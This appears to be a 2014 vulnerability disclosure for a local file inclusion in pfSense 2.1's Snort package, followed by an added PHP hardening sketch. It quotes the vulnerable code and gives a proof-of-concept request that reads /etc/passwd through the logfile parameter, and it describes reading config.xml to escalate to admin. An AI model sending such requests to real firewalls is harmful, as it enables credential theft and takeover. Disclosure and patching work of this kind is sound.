######################################################################
#
# Exploit Title: pfSense 2.1 Privilege Escalation from less privileged users (LFI/RCE)
# Date: 25/01/2014 (0-day)
# Exploit Author: @u0x (Pichaya Morimoto)
# Software Link: www.pfsense.org
# Category: Local File Inclusion (LFI) & Privilege Escalation
# Version: pfSense 2.1 build 20130911-1816 with snort 2.9.5.5 pkg v.3.0.2
#
#####################################################################

pfSense firewall/router distribution description :
======================================================================

pfSense is a free, open source customized distribution of FreeBSD tailored for use as a firewall and router. In addition to being a powerful, flexible firewalling and routing platform, it includes a long list of related features and a package system allowing further expandability without adding bloat and potential security vulnerabilities to the base distribution. pfSense is a popular project with more than 1 million downloads since its inception, and proven in countless installations ranging from small home networks protecting a PC and an Xbox to large corporations, universities and other organizations protecting thousands of network devices.

This project started in 2004 as a fork of the m0n0wall project, but focused towards full PC installations rather than the embedded hardware focus of m0n0wall. pfSense also offers an embedded image for Compact Flash based installations, however it is not our primary focus.

Attack Scenario
======================================================================

Authenticated users whose only permission is access to some packages in the web GUI (a.k.a. webConfigurator) are able to escalate themselves to a privileged admin by reading the /conf/config.xml file through bugs such as the Snort LFI, resulting in full compromise of the pfSense system. This attack abuses the user privilege scheme together with some of the official packages (System > Package Manager).

* Session hijacking is also possible to steal less privileged user sessions and perform this trick, because the webConfigurator is served over "http" by default.

Sample bug #1 : Snort Admin Privilege Escalation via Local File Inclusion Vulnerability

Vulnerable file:
======================================================================

snort_log_view.php

[+] Checksum
SHA1: ec1330e804eb028f2410c8ef9439df103bb2764c
MD5: cd767e46a4e9e09ede7fd26560e37f14

Vulnerable Source Code :
======================================================================

http://www.pfsense.com/packages/config/snort/snort_log_view.php
https://github.com/pfsense/pfsense-packages/blob/master/config/snort/snort_log_view.php

…(deducted)...

$contents = '';

// Read the contents of the argument passed to us.
// Is it a fully qualified path and file?
if (file_exists($_GET['logfile']))
	$contents = file_get_contents($_GET['logfile']);
// It is not something we can display, so print an error.
else
	$contents = gettext("\n\nERROR -- File: {$_GET['logfile']} not found!");

$pgtitle = array(gettext("Snort"), gettext("Log File Viewer"));
?>

…(deducted)...
…(deducted)...

Proof of Concept 1 : Arbitrary File Inclusion
======================================================================

GET /snort/snort_log_view.php?logfile=/etc/passwd HTTP/1.1
Host: firewall1.pentestlab1:1337
Connection: keep-alive
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: th,en-US;q=0.8,en;q=0.6
Cookie: PHPSESSID=980de3bdd73f6bc4728b0dca854de258; cookie_test=1390628083

HTTP/1.1 200 OK
Expires: Mon, 27 Jan 2014 07:25:10 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: max-age=180000
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Sat, 25 Jan 2014 05:25:10 GMT
X-Frame-Options: SAMEORIGIN
Pragma: no-cache
Content-type: text/html
Transfer-Encoding: chunked
Date: Sat, 25 Jan 2014 05:25:10 GMT
Server: lighttpd/1.4.32

…(deducted)...
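The root cause above is that snort_log_view.php hands an unvalidated, user-controlled path straight to file_exists() and file_get_contents(), so a package-only user can read /conf/config.xml and any other file the web server user can open. The following is an added hardening sketch written for this page, not pfSense's or the Snort package's own fix; the base directory /var/log/snort and the whitelist of file names are assumptions.

```php
<?php
// Added example (not pfSense code): confine the log viewer to one directory
// and an explicit list of file names, then re-check the canonical path.
define('SNORT_LOG_BASE', '/var/log/snort');      // assumed log directory
$allowed_logs = array('alert', 'snort.log');     // assumed list of viewable files

function resolve_log_path($base, array $allowed, $requested) {
    // 1. Accept only a bare file name: no slashes, backslashes or NUL bytes,
    //    which removes absolute paths and "../" traversal outright.
    if (!is_string($requested) || $requested === ''
        || strpbrk($requested, "/\\\0") !== false) {
        return null;
    }
    // 2. The name must appear on the explicit whitelist (strict comparison).
    if (!in_array($requested, $allowed, true)) {
        return null;
    }
    // 3. Canonicalise and confirm the result still lies under $base, so a
    //    symlink planted in the log directory cannot redirect the read.
    $real_base = realpath($base);
    $real_path = realpath($base . DIRECTORY_SEPARATOR . $requested);
    if ($real_base === false || $real_path === false) {
        return null;
    }
    if (strpos($real_path, $real_base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $real_path;
}

$requested = isset($_GET['logfile']) ? $_GET['logfile'] : '';
$path = resolve_log_path(SNORT_LOG_BASE, $allowed_logs, $requested);

if ($path !== null && is_file($path)) {
    $contents = file_get_contents($path);
} else {
    // Generic message: do not echo the attacker-controlled value back.
    $contents = gettext("\n\nERROR -- Requested log file is not available.");
}

// Escape before rendering so log contents cannot inject HTML into the page.
echo '<pre>' . htmlspecialchars($contents, ENT_QUOTES, 'UTF-8') . '</pre>';
```

Rejected requests are also worth logging with the authenticated username, since a `logfile` value containing a slash or an absolute path from a package-only user is exactly the pattern shown in the proof of concept.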